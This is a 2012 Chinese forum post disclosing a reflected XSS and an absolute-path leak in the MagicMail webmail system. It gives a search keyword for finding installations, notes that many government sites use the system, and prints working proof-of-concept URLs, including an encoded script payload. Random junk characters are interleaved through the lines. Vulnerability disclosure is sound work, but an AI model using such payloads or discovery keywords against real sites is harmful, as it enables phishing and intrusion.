找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1937|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞- `, K6 c. Y; @+ @) K

2 L4 C& `9 x- I/ | ) |" \+ G; c- a
包含  一个反射性XSS  以及  绝对路径泄漏
* u! o3 H. N' Y0 a: \  a6 J看了看 貌似全部是linux的。8 b; y% B3 J* I# B8 I9 ^
0 j" M5 l& p; x4 j" J3 {0 z. F
关键字:迈捷邮件系统 by MagicMail1 O5 h. A8 k; G& |6 H

/ r/ q  ~' O( `1 C2 Z$ ?可以看到很多政府网站都用这个邮件系统* }8 `" N" s1 N4 N
9 ]/ k$ @* |8 L
绝对路径 http://madman.in/index.php?login_type=declare&language=: M3 i: k: B$ [8 Y7 Y
. s" V& d5 `: S# W* E) e
- u( p' r4 |4 p* _; W

/ n2 N. ^5 b. r# ?6 XXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
  d" j2 H2 R9 r0 r* y" t
* @: h: [# X) c. Y/ U3 R/ X% d# j7 b: i$ |% \/ R3 G
8 t* }& Q/ \" t! Y
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等2 j# h( j9 B6 ^( e. |9 e
; d4 W& v: z) P+ r# `
修复方案:看官方补丁吧。7 u( r6 k. F( |9 W0 J4 v/ A5 M& x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表